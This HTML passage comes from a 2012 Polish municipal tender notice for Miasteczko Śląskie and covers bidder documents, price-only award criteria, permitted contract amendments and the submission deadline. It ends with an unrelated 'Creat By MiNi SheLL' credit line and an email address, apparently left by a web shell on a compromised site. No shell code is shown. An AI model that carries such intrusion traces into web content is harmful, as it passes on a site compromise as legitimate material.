<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotowego zamówienia;
2) wypełniony formularz oferty;
3) kosztorys ofertowy opracowany metodą kalkulacji szczegółowej zgodnie z założeniami określonymi w dziale XIV SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień umowy możliwe są jedynie w trybie art. 144 ustawy Pzp. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Burmistrza Miasta Miasteczko Śląskie, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności. Zamawiający przewiduje możliwość zmiany umowy w zakresie:

1) ceny ofertowej.
-	w przypadku ustawowej zmiany stawki podatku VAT w trakcie realizacji przedmiotu zamówienia o wielkość tej stawki;
-	w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym;
-	w przypadku wystąpienia wad dokumentacji projektowej skutkujących koniecznością dokonania jej poprawek powodujących zmianę wielkości lub zakresu przedmiotu zamówienia;
2) terminu realizacji zamówienia:
-	w przypadku udzielenia Wykonawcy zamówienia dodatkowego w oparciu o art. 67 ust. 1 pkt 5 ustawy Pzp, jeśli jego wykonanie (sposób, technologia) będzie stkutkowało wydłużeniem terminu wykonania zamówienia podstawowego;
-	w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia;
-	jeżeli warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych zgodnie z wymaganiami opisanymi w specyfikacji technicznej lub sztuką budowlaną. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca lub zła organizacja robót nie uzasadnia zmiany umowy;
-	w przypadku wystąpienia wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji;
-	w przypadku zaistnienia okoliczności niezależnych od Wykonawcy, a w szczególności w przypadku błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, itp.;
-	w przypadku zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
-	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie ze SIWZ.
W powyższych przypadkach nowy termin wykonania zamówienia podstawowego ustali Zamawiający po negocjacjach z Wykonawcą.
3) zmiany parametrów technicznych przyjętych rozwiązań:
Zamawiający przewiduje możliwość dokonania zmiany technologii wykonania robót, lub zmiany materiałów, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu nie pogorszonych standardów jakościowych.
W powyższym przypadku Wykonawca jest zobowiązany do przeprowadzenia uzgodnień z projektantem odnośnie proponowanych zmian.
Zmiany parametrów technicznych nie mogą wpłynąć na wysokość ceny przyjętej w ofercie.
4) osób wyznaczonych przez Zamawiającego i Wykonawcę do nadzorowania i kontaktów roboczych w trakcie realizacji przedmiotu zamówienia
Osoby wyznaczone i wpisane do umowy jako osoby nadzorujące lub współpracujące w zakresie realizacji przedmiotu zamówienia mogą być zmienione zarówno przez Zamawiającego i Wykonawcę. Jeśli osoby te winny spełniać określone wymagania, to strony potwierdzą to w sposób przewidziany w niniejszej SIWZ. Jeżeli osoby te nie muszą spełniać określonych wymagań, to ich zmiana może nastąpić po uprzednim pisemnym zawiadomieniu strony przeciwnej umowy.
5) podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy.
2. Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenie propozycji zmiany przez Zamawiającego.
3. Wykonawcy nie przysługuje żadne roszczenie w przypadku niewykonania szacowanego zakresu prac wynikających z braku zlecenia tych prac.
4. Zmiana umowy w zakresie pkt 1 ppkt 2), 3), 4), 5) nie powodują zmiany wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.miasteczko-slaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 10:00, miejsce: Urząd Miejski w Miasteczku Śląskim, 42-610 Miasteczko Śląskie, ul. Rynek 8, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com